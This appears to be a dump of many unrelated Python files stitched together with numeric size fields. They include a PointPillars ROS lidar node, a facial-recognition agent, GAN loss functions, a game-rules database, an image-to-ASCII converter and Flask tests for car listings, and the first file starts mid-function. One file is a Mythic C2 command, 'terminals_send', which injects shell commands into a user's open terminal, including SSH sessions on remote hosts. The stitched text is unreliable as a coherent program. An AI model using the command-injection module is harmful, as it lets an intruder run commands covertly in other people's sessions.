result = predict_kitti_to_anno(net, example_tuple, class_names, center_limit_range, model_cfg.lidar_input, global_set)
print("result", result)
# def evaluate(config_path,
# model_dir,
# result_path=None,
# predict_test=False,
# ckpt_path=None,
# ref_detfile=None,
# pickle_result=True,
# read_predict_pkl_path=None):
#
# model_dir = str(Path(model_dir).resolve())
# if predict_test:
# result_name = 'predict_test'
# else:
# result_name = 'eval_results'
# if result_path is None:
# model_dir = Path(model_dir)
# result_path = model_dir / result_name
# else:
# result_path = pathlib.Path(result_path)
#
# if isinstance(config_path, str):
# config = pipeline_pb2.TrainEvalPipelineConfig()
# with open(config_path, "r") as f:
# proto_str = f.read()
# text_format.Merge(proto_str, config)
# else:
# config = config_path
#
# input_cfg = config.eval_input_reader
# model_cfg = config.model.second
# train_cfg = config.train_config
# class_names = list(input_cfg.class_names)
# center_limit_range = model_cfg.post_center_limit_range
# #########################
# # Build Voxel Generator
# #########################
# voxel_generator = voxel_builder.build(model_cfg.voxel_generator)
# bv_range = voxel_generator.point_cloud_range[[0, 1, 3, 4]]
# box_coder = box_coder_builder.build(model_cfg.box_coder)
# target_assigner_cfg = model_cfg.target_assigner
# target_assigner = target_assigner_builder.build(target_assigner_cfg,
# bv_range, box_coder)
#
# net = second_builder.build(model_cfg, voxel_generator, target_assigner, input_cfg.batch_size)
# net.cuda()
# if train_cfg.enable_mixed_precision:
# net.half()
# net.metrics_to_float()
# net.convert_norm_to_float(net)
#
# if ckpt_path is None:
# torchplus.train.try_restore_latest_checkpoints(model_dir, [net])
# else:
# torchplus.train.restore(ckpt_path, net)
#
# eval_dataset = input_reader_builder.build(
# input_cfg,
# model_cfg,
# training=False,
# voxel_generator=voxel_generator,
# target_assigner=target_assigner)
#
# eval_dataloader = torch.utils.data.DataLoader(
# eval_dataset,
# batch_size=input_cfg.batch_size,
# shuffle=False,
# num_workers=input_cfg.num_workers,
# pin_memory=False,
# collate_fn=merge_second_batch)
#
# if train_cfg.enable_mixed_precision:
# float_dtype = torch.float16
# else:
# float_dtype = torch.float32
#
# net.eval()
# result_path_step = result_path / f"step_{net.get_global_step()}"
# result_path_step.mkdir(parents=True, exist_ok=True)
# t = time.time()
# dt_annos = []
# global_set = None
# eval_data = iter(eval_dataloader)
# example = next(eval_data)
# example = example_convert_to_torch(example, float_dtype)
# example_tuple = list(example.values())
# example_tuple[5] = torch.from_numpy(example_tuple[5])
# if (example_tuple[3].size()[0] != input_cfg.batch_size):
# continue
#
# dt_annos += predict_kitti_to_anno(
# net, example_tuple, class_names, center_limit_range,
# model_cfg.lidar_input, global_set)
# for example in iter(eval_dataloader):
# # eval example [0: 'voxels', 1: 'num_points', 2: 'coordinates', 3: 'rect'
# # 4: 'Trv2c', 5: 'P2', 6: 'anchors', 7: 'anchors_mask'
# # 8: 'image_idx', 9: 'image_shape']
#
# # eval example [0: 'voxels', 1: 'num_points', 2: 'coordinate', 3: 'anchors',
# # 4: 'anchor_mask', 5: 'pc_idx']
# example = example_convert_to_torch(example, float_dtype)
# # eval example [0: 'voxels', 1: 'num_points', 2: 'coordinate', 3: 'anchors',
# # 4: 'anchor_mask', 5: 'pc_idx']
#
# example_tuple = list(example.values())
# example_tuple[5] = torch.from_numpy(example_tuple[5])
# # example_tuple[9] = torch.from_numpy(example_tuple[9])
#
# if (example_tuple[3].size()[0] != input_cfg.batch_size):
# continue
#
# dt_annos += predict_kitti_to_anno(
# net, example_tuple, class_names, center_limit_range,
# model_cfg.lidar_input, global_set)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='testing')
args = parser.parse_args()
model_dir = "/nfs/nas/model/songhongli/neolix_shanghai_3828/"
config_path = "/home/songhongli/Projects/pointpillars2/second/configs/pointpillars/xyres_16_4cls.proto"
if isinstance(config_path, str):
config = pipeline_pb2.TrainEvalPipelineConfig()
with open(config_path, "r") as f:
proto_str = f.read()
text_format.Merge(proto_str, config)
else:
config = config_path
input_cfg = config.eval_input_reader
model_cfg = config.model.second
train_cfg = config.train_config
class_names = list(input_cfg.class_names)
center_limit_range = model_cfg.post_center_limit_range
#########################
# Build Voxel Generator
#########################
voxel_generator = voxel_builder.build(model_cfg.voxel_generator)
bv_range = voxel_generator.point_cloud_range[[0, 1, 3, 4]]
box_coder = box_coder_builder.build(model_cfg.box_coder)
target_assigner_cfg = model_cfg.target_assigner
target_assigner = target_assigner_builder.build(target_assigner_cfg,
bv_range, box_coder)
net = second_builder.build(model_cfg, voxel_generator, target_assigner, input_cfg.batch_size)
net.cuda()
torchplus.train.try_restore_latest_checkpoints(model_dir, [net])
# code added for using ROS
rospy.init_node('pointpillars_ros_node')
sub_ = rospy.Subscriber("/sensor/velodyne16/all/compensator/PointCloud2", PointCloud2, callback, queue_size=1)
pub_points = rospy.Publisher("points_modified", PointCloud2, queue_size=1)
pub_arr_bbox = rospy.Publisher("pre_arr_bbox", BoundingBoxArray, queue_size=10)
# pub_bbox = rospy.Publisher("voxelnet_bbox", BoundingBox, queue_size=1)
print("[+] voxelnet_ros_node has started!")
rospy.spin()
| 18,417 | 6,916 |
#!/usr/bin/env python3
""" HIAS TassAI Facial Recognition Agent.
HIAS TassAI Facial Recognition Agent processes streams from local
or remote cameras to identify known and unknown humans.
MIT License
Copyright (c) 2021 Asociación de Investigacion en Inteligencia Artificial
Para la Leucemia Peter Moss
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files(the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Contributors:
- Adam Milton-Barker
"""
import sys
from abc import ABC, abstractmethod
from modules.AbstractAgent import AbstractAgent
from modules.helpers import helpers
from modules.model import model
from modules.read import read
from modules.stream import stream
from modules.sockets import sockets
from threading import Thread
class agent(AbstractAgent):
""" HIAS TassAI Facial Recognition Agent
HIAS TassAI Facial Recognition Agent processes
streams from local or remote cameras to identify
known and unknown humans.
"""
def set_model(self, mtype):
# Inititializes the TassAI model
self.model = model(self.helpers)
def load_model(self):
""" Loads the trained model """
# Prepares the network and data
self.model.prepare_network()
self.model.prepare_data()
def server(self):
""" Loads the API server """
# Starts the MQTT connection
self.mqtt_start()
# Inititializes the socket
self.sockets = sockets(self.helpers)
# Loads the TassAI model
self.load_model()
# Camera read and stream threads
Thread(target=read.run, args=(self, ),
daemon=True).start()
Thread(target=stream.run, args=(self, ),
daemon=True).start()
def signal_handler(self, signal, frame):
self.helpers.logger.info("Disconnecting")
self.mqtt.disconnect()
sys.exit(1)
agent = agent()
def main():
if len(sys.argv) < 2:
agent.helpers.logger.info(
"You must provide an argument")
exit()
elif sys.argv[1] not in agent.helpers.confs["agent"]["params"]:
agent.helpers.logger.info(
"Mode not supported! server, train or inference")
exit()
mode = sys.argv[1]
if mode == "classify":
agent.set_model("")
agent.inference()
elif mode == "server":
agent.set_model("")
agent.server()
if __name__ == "__main__":
main()
| 3,112 | 1,063 |
# -*- coding: utf-8 -*-
class LineConstants:
method = 'method'
output = 'output'
enter = 'enter'
parent = 'parent'
command = 'command'
service = 'service'
| 181 | 63 |
from CommandBase import *
import json
from MythicResponseRPC import *
class TerminalsSendArguments(TaskArguments):
def __init__(self, command_line):
super().__init__(command_line)
self.args = {
"window": CommandParameter(
name="window",
type=ParameterType.Number,
description="window # to send command to",
),
"tab": CommandParameter(
name="tab",
type=ParameterType.Number,
description="tab # to send command to",
),
"command": CommandParameter(
name="command",
type=ParameterType.String,
description="command to execute",
),
}
async def parse_arguments(self):
if len(self.command_line) > 0:
if self.command_line[0] == "{":
self.load_args_from_json_string(self.command_line)
else:
raise ValueError("Missing JSON arguments")
else:
raise ValueError("Missing arguments")
class TerminalsSendCommand(CommandBase):
cmd = "terminals_send"
needs_admin = False
help_cmd = "terminals_send"
description = """
This uses AppleEvents to inject the shell command, {command}, into the specified terminal shell as if the user typed it from the keyboard. This is pretty powerful. Consider the instance where the user is SSH-ed into another machine via terminal - with this you can inject commands to run on the remote host. Just remember, the user will be able to see the command, but you can always see what they see as well with the "terminals_read contents" command.
"""
version = 1
is_exit = False
is_file_browse = False
is_process_list = False
is_download_file = False
is_remove_file = False
is_upload_file = False
author = "@its_a_feature_"
attackmapping = ["T1059", "T1184"]
argument_class = TerminalsSendArguments
async def create_tasking(self, task: MythicTask) -> MythicTask:
resp = await MythicResponseRPC(task).register_artifact(
artifact_instance="{}".format(
task.args.get_arg("command"),
),
artifact_type="Process Create",
)
resp = await MythicResponseRPC(task).register_artifact(
artifact_instance="Target Application of Terminal",
artifact_type="AppleEvent Sent",
)
return task
async def process_response(self, response: AgentResponse):
pass
| 2,576 | 654 |
import tensorflow as tf
from tensorflow.keras import backend
#DEPRECATED
# An implementation of wasserstein used for a naive implementation of WGAN
# calculate wasserstein loss
def wasserstein_loss(y_true, y_pred):
return backend.mean(y_true * y_pred)
# Define the loss functions for the discriminator,
# which should be (fake_loss - real_loss).
# We will add the gradient penalty later to this loss function.
def discriminator_loss(real_img, fake_img):
real_loss = tf.reduce_mean(real_img)
fake_loss = tf.reduce_mean(fake_img)
return real_loss, fake_loss, fake_loss - real_loss
# Define the loss functions for the generator.
def generator_loss(fake_img):
return -tf.reduce_mean(fake_img)
| 711 | 226 |
import re
import math
import numexpr as ne
MATH_CONST = {
'pi': math.pi,
'π': math.pi,
'e': math.e,
'inf': math.inf,
'i': 1j,
'j': 1j,
}
SUB_MAP = {
# replace UTF char with ASCII char
'(': '(',
')': ')',
',': ',',
'-': '-',
'÷': '/',
'×': '*',
'+': '+',
# replace common synonym
'ln': 'log',
'lg': 'log10',
'∞': 'inf',
'mod': '%',
}
SUB_RE = re.compile('|'.join(re.escape(s) for s in SUB_MAP.keys()))
def evaluate(txt: str):
txt = SUB_RE.sub(lambda m: SUB_MAP[m.group(0)], txt)
return ne.evaluate(txt, local_dict=MATH_CONST).item()
| 623 | 278 |
from collections import Mapping
from . import yang_models
class Meta(type):
class Interface(
yang_models
.com_adva_netemu_testemu_client_TestInterface_YangListModel):
"""
Pythonizer for Java class ``TestInterface``.
From Java package ``com.adva.netemu.testemu.client``
"""
class TestNetwork(
yang_models.com_adva_netemu_testemu_client_TestNetwork_YangModel,
metaclass=Meta):
"""
Pythonizer for Java class ``TestNetwork``.
From Java package ``com.adva.netemu.testemu.client``
"""
@property
def interfaces(self):
class List(Mapping):
@staticmethod
def __len__():
return len(self._java_object.getInterfaces())
@staticmethod
def __iter__():
for intf in self._java_object.getInterfaces():
yield type(self).Interface(intf)
@staticmethod
def __getitem__(name):
for intf in List.__iter__():
if intf.name() == name:
return intf
raise KeyError(name)
return List()
| 1,185 | 327 |
import gym
import torch
from asym_rlpo.utils.debugging import checkraise
from .base import Representation
class IdentityRepresentation(Representation):
def __init__(self, input_space: gym.spaces.Box):
super().__init__()
checkraise(
isinstance(input_space, gym.spaces.Box)
and len(input_space.shape) == 1,
TypeError,
'input_space must be Box',
)
(self.__out_dim,) = input_space.shape
@property
def dim(self):
return self.__out_dim
def forward( # pylint: disable=no-self-use
self, inputs: torch.Tensor
) -> torch.Tensor:
return inputs
| 666 | 205 |
import sys
import traceback
from ggplib.util import log
from ggplib.statemachine import builder
from ggplib.db import signature
class GameInfo(object):
def __init__(self, game, gdl_str):
self.game = game
self.gdl_str = gdl_str
# might be None, depends on whether we grab it from sig.json
self.idx = None
# lazy loads in get_symbol_map()
self.sigs = None
self.symbol_map = None
# lazy loads
self.sm = None
self.model = None
def get_symbol_map(self):
if self.sigs is None:
idx, self.sigs = signature.get_index(self.gdl_str, verbose=False)
if self.idx is not None:
assert self.idx == idx
else:
self.idx = idx
self.symbol_map = signature.build_symbol_map(self.sigs, verbose=False)
def lazy_load(self, the_game_store):
if self.sm is None:
# ok here we can cache the game XXX
self.model, self.sm = builder.build_sm(self.gdl_str,
the_game_store=the_game_store,
add_to_game_store=True)
log.verbose("Lazy loading done for %s" % self.game)
def get_sm(self):
return self.sm.dupe()
class TempGameInfo(object):
def __init__(self, game, gdl_str, sm, model):
self.game = game
self.gdl_str = gdl_str
self.sm = sm
self.model = model
def get_sm(self):
return self.sm.dupe()
class GameInfoBypass(GameInfo):
''' bypass everything, special case statemachine that doesn't have any GDL '''
special_game = True
def __init__(self, game, sm, model):
self.game = game
self.sm = sm
self.model = model
def get_symbol_map(self):
pass
def lazy_load(self, the_game_store):
pass
def get_sm(self):
return self.sm.dupe()
###############################################################################
class LookupFailed(Exception):
pass
class GameDatabase:
def __init__(self, root_store):
self.root_store = root_store
self.rulesheets_store = root_store.get_directory("rulesheets")
self.games_store = root_store.get_directory("games", create=True)
self.idx_mapping = {}
self.game_mapping = {}
@property
def all_games(self):
return self.game_mapping.keys()
def load(self, verbose=True):
if verbose:
log.info("Building the database")
filenames = self.rulesheets_store.listdir("*.kif")
for fn in sorted(filenames):
# skip tmp files
if fn.startswith("tmp"):
continue
game = fn.replace(".kif", "")
# get the gdl
gdl_str = self.rulesheets_store.load_contents(fn)
info = GameInfo(game, gdl_str)
# first does the game directory exist?
the_game_store = self.games_store.get_directory(game, create=True)
if the_game_store.file_exists("sig.json"):
info.idx = the_game_store.load_json("sig.json")['idx']
else:
if verbose:
log.verbose("Creating signature for %s" % game)
info.get_symbol_map()
if info.symbol_map is None:
log.warning("FAILED to add: %s" % game)
raise Exception("FAILED TO add %s" % game)
# save as json
assert info.idx is not None
the_game_store.save_json("sig.json", dict(idx=info.idx))
assert info.idx is not None
if info.idx in self.idx_mapping:
other_info = self.idx_mapping[info.idx]
log.warning("DUPE GAMES: %s %s!=%s" % (info.idx, game, other_info.game))
raise Exception("Dupes not allowed in database")
self.idx_mapping[info.idx] = info
self.game_mapping[info.game] = info
def get_by_name(self, name):
if name not in self.game_mapping:
raise LookupFailed("Did not find game: %s" % name)
info = self.game_mapping[name]
if getattr(info, "special_game", False):
return info
# for side effects
info.get_symbol_map()
the_game_store = self.games_store.get_directory(name)
info.lazy_load(the_game_store)
return info
def lookup(self, gdl_str):
idx, sig = signature.get_index(gdl_str, verbose=False)
if idx not in self.idx_mapping:
raise LookupFailed("Did not find game : %s" % idx)
info = self.idx_mapping[idx]
info.get_symbol_map()
# create the symbol map for this gdl_str
symbol_map = signature.build_symbol_map(sig, verbose=False)
new_mapping = {}
# remap the roles back
roles = info.sigs.roles.items()
for ii in range(len(roles)):
match = "role%d" % ii
for k1, v1 in roles:
if v1 == match:
for k2, v2 in sig.roles.items():
if v2 == match:
new_mapping[k2] = k1
break
# remap the other symbols
for k1, v1 in info.symbol_map.items():
new_mapping[symbol_map[k1]] = v1
# remove if the keys/values all the same in new_mapping
all_same = True
for k, v in new_mapping.items():
if k != v:
all_same = False
break
if all_same:
new_mapping = None
# log.info("Lookup - found game %s in database" % info.game)
the_game_store = self.games_store.get_directory(info.game)
info.lazy_load(the_game_store)
return info, new_mapping
###############################################################################
def install_draughts(add_game):
' load custom c++ statemachine for draughts '
from ggplib import interface
from ggplib.non_gdl_games.draughts import desc, model
desc10 = desc.BoardDesc(10)
cpp_statemachines = interface.CppStateMachines()
model = model.create_sm_model(desc10)
for game_variant in ["draughts_10x10",
"draughts_killer_10x10",
"draughts_bt_10x10"]:
sm_create_meth = getattr(cpp_statemachines, game_variant)
add_game(game_variant, sm_create_meth(), model)
def install_hex(add_game):
' load custom c++ statemachine for draughts '
from ggplib import interface
from ggplib.non_gdl_games.hex.model import create_sm_model
cpp_statemachines = interface.CppStateMachines()
for sz in [9, 11, 13, 15, 19]:
cpp_sm = cpp_statemachines.get_hex(sz)
model = create_sm_model(sz)
add_game("hex_lg_%s" % sz, cpp_sm, model)
###############################################################################
# The API:
the_database = None
def get_database(verbose=True):
global the_database
def add_game_to_db(game, sm, model):
info = GameInfoBypass(game, sm, model)
the_database.game_mapping[game] = info
if the_database is None:
from ggplib.db.store import get_root
the_database = GameDatabase(get_root())
the_database.load(verbose=verbose)
try:
install_draughts(add_game_to_db)
except Exception as err:
log.error("Failed to install draughts: %s" % err)
try:
install_hex(add_game_to_db)
except Exception as err:
log.error("Failed to install hex: %s" % err)
return the_database
def get_all_game_names():
return get_database().all_games
# XXX build_sm not used.
def by_name(name, build_sm=True):
try:
db = get_database(verbose=False)
return db.get_by_name(name)
except Exception as exc:
# creates temporary files
msg = "Lookup of %s failed: %s" % (name, exc)
log.error(msg)
log.error(traceback.format_exc())
raise LookupFailed(msg)
def by_gdl(gdl):
try:
gdl_str = gdl
if not isinstance(gdl, str):
lines = []
for s in gdl:
lines.append(str(s))
gdl_str = "\n".join(lines)
db = get_database()
try:
info, mapping = db.lookup(gdl_str)
except LookupFailed as exc:
etype, value, tb = sys.exc_info()
traceback.print_exc()
raise LookupFailed("Did not find game %s" % exc)
return mapping, info
except Exception as exc:
# creates temporary files
log.error("Lookup failed: %s" % exc)
model, sm = builder.build_sm(gdl)
info = TempGameInfo("unknown", gdl, sm, model)
return None, info
| 8,885 | 2,762 |
import fiber
from django.test import SimpleTestCase
from ...test_util import RenderMixin
class TestFiberVersion(RenderMixin, SimpleTestCase):
def test_fiber_version(self):
self.assertRendered('{% load fiber_tags %}{% fiber_version %}', str(fiber.__version__))
| 274 | 86 |
#! /usr/bin/python3
import sys, re
from PIL import Image
# return the argument if it exists (converted to the same type as the default), otherwise default
default = lambda arg, defa: type(defa)(sys.argv[arg]) if len(sys.argv) > arg and sys.argv[arg] else defa
# filename of image to evaluate, default is image.jpg
IMAGE = default(1, "image.jpg")
# filename of output, default just prints it to stdout
OUTPUT = default(2, "")
# outputs in defined way based on whether or not an output file is given
if OUTPUT == "": output = print
else:
def output(*args, **kwargs):
with open(OUTPUT, "w+") as ofile:
ofile.write(*args, **kwargs)
# output columns (width)
COLS = default(3, 200)
# color hues (degrees, [0-360))
COLORS = dict()
with open('colors.txt') as f:
# each line in the file
for line in f.readlines():
# means comment
if line.startswith('#'): continue
# name: hue saturation
# split bt name and values
line = line.split(':')
# split values with whitespace characters
line = [line[0], *line[1].strip().split('\t')]
# strip blank things from each piece
for i, piece in enumerate(line): line[i] = piece.strip()
# add key to COLORS
name, hue, sat = line
COLORS[name] = (None if hue == '*' else int(hue), None if sat == '*' else float(sat))
# characters for lightness values (ascending)
CHARS = " -+:!?%#&$@"
# color class
class Color:
def __init__(self, r=0, g=0, b=0, name=None):
self.r, self.g, self.b = r, g, b
self.vals = ('r', 'g', 'b')
self.name = name
# reduce the color to accumulator
def reduce(self, reducer, accumulator=0):
for v in self.vals:
accumulator = reducer(accumulator, getattr(self, v))
return accumulator
# executes f for each value of this color, returns a list of results
def for_each(self, f):
return [f(getattr(self, v)) for v in self.vals]
# executes f on each color value, returns list of results
def on_each(self, other, f):
return [f(getattr(self, v), getattr(other, v)) for v in self.vals]
# add with another color
def __add__(self, color2):
if type(color2) == Color:
return Color(*self.on_each(color2, lambda a, b: a + b))
else:
return Color(*self.for_each(lambda x: x + color2))
# multiply with another color
def __mul__(self, color2):
if type(color2) == Color:
return Color(*self.on_each(color2, lambda a, b: a * b))
else:
return Color(*self.for_each(lambda x: x * color2))
# subtract another color
def __sub__(self, color2):
return self + -1*color2
# divide by another color
def __truediv__(self, color2):
if type(color2) == Color:
return Color(*self.on_each(color2, lambda a, b: a / b))
else:
return Color(*self.for_each(lambda x: x / color2))
# get the difference between 2 colors (like subtraction but with no negatives)
def diff(self, color2):
return Color(*self.on_each(color2, lambda a, b: abs(a - b)))
# get the sum of the rgb values
def sum(self):
return self.reduce(lambda a, b: a + b)
# get the lightness of this color as a decimal percent
# 1 means brightest, 0 means darkest, 0.5 means middle...
def graylightness(self):
return self.sum() / 765
# returns the hsl version of this color
def hsl(self):
## setup
# normalized version of self
nself = self / 255
# rgb values
vals = nself.for_each(lambda x: x)
x, n = max(vals), min(vals) # max value
d = x - n # difference bt max and min
## hue
hue = 0;
if d == 0: pass # max and min same
elif x == nself.r: hue = 60*( (nself.g - nself.b) / d % 6 ) # r is max
elif x == nself.g: hue = 60*( (nself.b - nself.r) / d + 2 ) # g is max
else: hue = 60*( (nself.r - nself.g) / d + 4 ) # b is max
lightness = (x + n) / 2 ## lightness
saturation = 0 if d == 0 else d / (1 - abs(2*lightness - 1)) ## saturation
# add 360 to hue if it's negative
return (hue < 0)*360 + hue, saturation, lightness
# approximate a given color to be one of the colors listed in COLORS
# works by comparing hue values. lowest difference wins
def approx(self, hsl=None):
if hsl == None: hsl = self.hsl()
hue, sat = hsl[:2]
# the best one so far: (score, name, diff)
best = (None, None, None)
for name in COLORS.keys():
chue, csat = COLORS[name]
a, am, b, bm = 0, 2, 0, 2
# if hue does matter
if chue != None: a, bm = abs(hue - chue)/360, 1
# if saturation does matter
if csat != None: b, am = abs(sat - csat), 1
# sum of difference in hue and saturation is the score
score = a*am + b*bm
# if this is a new best score
if best[0] == None or score < best[0]:
best = (score, name)
# return the name of the best color
return best[1]
# color the string the color that the name describes
def color_str(self, string, colorName):
return f'<font color="{colorName}">{string}'
# where the output will be accumulated to
accumulator = '<body style="background-color: #000"><pre>'
# open the image
with Image.open(IMAGE) as img:
# the step to increment by each time
step = img.size[0] / COLS
# the vertical step, to account for characters not being squares
vstep = step * 15/7.81
# the current color
curcolor = None
# each row
for row in range(int(img.size[1]/vstep)):
row *= vstep
# add newline character to go to next row if this isn't the first row
accumulator += '\n'
# each column
for col in range(COLS):
col *= step
# average the colors for this location
avgcolor = Color()
colorc = 0 # color count
# within this tile/area
for y in range(int(row), int(row + vstep)):
for x in range(int(col), int(col + step)):
if x >= img.size[0]: break # break if it's out of range
# add this pixel's color to the average
avgcolor += Color(*img.getpixel((x, y)))
colorc += 1
if y >= img.size[1]: break # break if it's out of range
# turn sum into average
avgcolor /= colorc
# get the hsl version
hsl = avgcolor.hsl()
# approximate the color
apcolor = avgcolor.approx(hsl)
# pick the right character based on the lightness
char = CHARS[round(hsl[2]*(len(CHARS) - 1))]
# if it isn't already in the right color, change it
if apcolor != curcolor:
# add colored string to accumulator
accumulator += "</font>" + avgcolor.color_str(char, apcolor)
# new color
curcolor = apcolor
else:
# add character
accumulator += char
# end the elements
accumulator += "</font></pre></body>"
# output the result
output(accumulator)
| 7,352 | 2,303 |
import pytest
from coding_challenge.users.models import User
from coding_challenge.users.tests.factories import UserFactory
from coding_challenge.ship_manager.models import Ship
from coding_challenge.ship_manager.tests.factories import ShipFactory
@pytest.fixture(autouse=True)
def media_storage(settings, tmpdir):
settings.MEDIA_ROOT = tmpdir.strpath
@pytest.fixture
def user() -> User:
return UserFactory()
@pytest.fixture
def ship() -> Ship:
return ShipFactory()
| 485 | 155 |
# -*- coding: utf-8 -*-
# @Author: edward
# @Date: 2016-05-12 14:11:21
# @Last Modified by: edward
# @Last Modified time: 2016-05-12 17:29:48
from functools import partial
# api = swagger.docs(Api(app), apiVersion='0.1',
# basePath='http://localhost:5000',
# resourcePath='/',
# produces=["application/json", "text/html"],
# api_spec_url='/api/spec',
# description='A Basic API')
class _APIs:
def __init__(self):
self.apis = []
self.make_docs()
def add_api(self, method, **kw):
self.apis.append(self.pre_api(method, **kw))
def operation(self, **kw):
return partial(self.add_api, **kw)
def pre_api(self, fn, **kw):
d = dict(
method=fn.__name__,
)
d.update(kw)
return d
def get_spec(self):
return self.apis
def make_docs(self, apiVersion='1.0', swaggerVersion='1.2',
basePath='http://localhost:9999',
resourcePath='/',
produces=["application/json"],
api_spec_url='/api/spec',
description='Auto generated API docs by swagger'):
self.API_VERSION = apiVersion
self.SWAGGER_VERSION = swaggerVersion
self.BASE_PATH = basePath
self.RESOURCE_PATH = resourcePath
self.PRODUCES = produces
self.API_SPEC_URL = api_spec_url
self.DESCRIPTION = description
apis = _APIs()
operation = apis.operation
docs = apis.make_docs
get_api_spec = apis.get_spec
def main():
class Handler:
@operation(
nickname="get something from api"
)
def get(self):
"""this is get notes """
print 'get'
def post(self):
print 'post'
for i in apis.apis:
print i
if __name__ == '__main__':
main()
| 1,909 | 627 |
import os
import unittest
import sqlalchemy
from flask import Flask,session,url_for,redirect
from flask_sqlalchemy import SQLAlchemy
from application import create_app ,db
import unittest
import json
from caruser.models import User, UserBank
from carupload.models import CarOption,Car,CarImage
from flask_testing import TestCase
from utilities.dao.userdao import UserDao
from utilities.dao.cardao import CarDao
from utilities.testutil import TestUtil
from freezegun import freeze_time
from datetime import datetime as dt
from datetime import timedelta
from settings import TEST_DB_URI,MONGO_URI
import urllib
from utilities.flask_tracking.documents import Tracking
from mongoengine.queryset.visitor import Q
import os
TEST_UPLOADED_FOLDER='/static/images/test_images'
class CaruploadTest(TestUtil):
def validate_caroption(self,data,carOption):
for key in data:
option_data = getattr(carOption,key) if getattr(carOption,key) is not None else ""
self.assertEqual(data[key],option_data)
# def test_mongoDB_api(self):
# rv = self.client.get(
# '/api/getCarBrand',
# content_type='application/json',
# follow_redirects=True
# )
# data = json.loads(rv.get_data().decode('utf-8'))
# self.assertTrue(len(data) >50)
# self.check_mongoData('brandName','api/getCarClass','기아')
# self.check_mongoData('brandName','api/getCarClass','현대')
#
# self.check_mongoData('className','api/getCarModel','K9')
# self.check_mongoData('className','api/getCarModel','쏘울')
def test_carWith_coordinate(self):
with self.client.session_transaction() as session:
rv1= self.register_user()
session['email'] = 'todhm@nate.com'
session['verification_code'] = '12345'
rv2 = self.verify_code(code = '123445')
carWithCoord = self.return_car_with_coord()
rv = self.client.post(
'/api/add_basic_info',
data=json.dumps(carWithCoord),
content_type='application/json',
follow_redirects=True
)
data = json.loads(rv.get_data().decode('utf-8'))
user_id = self.userdao.get_user_id(session['email'])
car = self.cardao.get_car_obj(user_id)
self.verify_car_basic(car,carWithCoord)
self.assertAlmostEqual(float(car.lng),carWithCoord['address']['pointX'])
self.assertAlmostEqual(float(car.lat),carWithCoord['address']['pointY'])
def test_update_car(self):
with self.client.session_transaction() as session:
rv1= self.register_user()
session['email'] = 'todhm@nate.com'
session['verification_code'] = '12345'
rv2 = self.verify_code(code = '123445')
car_without_coord = self.return_car_without_coord()
rv = self.client.post(
'/api/add_basic_info',
data=json.dumps(car_without_coord),
content_type='application/json',
follow_redirects=True
)
data = json.loads(rv.get_data().decode('utf-8'))
user_id = self.userdao.get_user_id(session['email'])
car = self.cardao.get_car_obj(user_id)
car_id = car.id
car_without_coord['brandName'] = "르노삼성"
car_without_coord['model']="sm5"
car_without_coord['transmission'] = "manual"
rv = self.client.post(
'/api/add_basic_info' + '/'+str(car_id),
data=json.dumps(car_without_coord),
content_type='application/json',
follow_redirects= True
)
user_id = self.userdao.get_user_id(session['email'])
car = self.cardao.get_car_obj(user_id)
self.verify_car_basic(car,car_without_coord)
def test_car_without_coordinate(self):
with self.client.session_transaction() as session:
self.register_user_with_phone()
car_without_coord = self.return_car_without_coord()
session['email'] = 'todhm@nate.com'
rv = self.client.post(
'/api/add_basic_info',
data=json.dumps(car_without_coord),
content_type='application/json',
follow_redirects=True
)
user_id = self.userdao.get_user_id(session['email'])
car = self.cardao.get_car_obj(user_id)
self.verify_car_basic(car,car_without_coord)
self.assertTrue(isinstance(float(car.lng), float))
self.assertTrue(isinstance(float(car.lat),float))
def test_proper_address(self):
self.verify_address('평촌대로40번길 100')
self.verify_address('신사동 502')
self.verify_address('제주시 도령로 129')
def test_proper_region(self):
self.verify_region('과천도서관')
self.verify_region('연세대학교')
self.verify_region('고려대학교')
self.verify_region('패스트캠퍼스')
def test_liscence_addwith_correctemail(self):
with self.client.session_transaction() as session:
self.register_user_with_phone('todhm@naver.com')
session['email'] = 'todhm@naver.com'
liscence_data = self.return_full_liscence_info()
rv = self.client.post(
'/api/add_liscence_info',
data=json.dumps(liscence_data),
content_type='application/json',
follow_redirects=True
)
user = self.userdao.get_user_obj(session['email'])
self.assertEqual(user.liscence_1 , liscence_data['liscence_1'])
def test_liscence_with_uncomplete(self):
with self.client.session_transaction() as session:
self.register_user_with_phone('todhm@naver.com')
session['email'] = 'todhm@naver.com'
liscence_data = self.return_full_liscence_info()
liscence_data.pop('liscence_1')
rv = self.client.post(
'/api/add_liscence_info',
data=json.dumps(liscence_data),
content_type='application/json',
follow_redirects=True
)
self.assertTrue(json.loads(rv.data.decode())['message'] !="success")
def test_liscence_addwith_withoutsession(self):
self.register_user_with_phone(email = 'todhm@naver.com')
self.client.get('/logout')
self.register_user_with_phone(email = 'gmlaud14@nate.com')
liscence_data = self.return_full_liscence_info()
rv = self.client.post(
'/api/add_liscence_info',
data=json.dumps(liscence_data),
content_type='application/json',
follow_redirects=True
)
with self.client.session_transaction() as session:
user = self.userdao.get_user_obj('todhm@naver.com')
self.assertTrue(user.liscence_1 != liscence_data['liscence_1'])
def test_get_liscence(self):
self.register_user_with_phone(email = 'todhm@naver.com')
liscence_data = self.return_full_liscence_info()
rv = self.client.post(
'/api/add_liscence_info',
data=json.dumps(liscence_data),
content_type='application/json',
follow_redirects=True
)
with self.client.session_transaction() as session:
rv = self.client.get('/api/get_liscence')
liscence_json = json.loads(rv.get_data().decode('utf-8'))
self.assertTrue(liscence_json['liscence_1'] == liscence_data['liscence_1'])
self.assertTrue(liscence_json['liscence_2'] == liscence_data['liscence_2'])
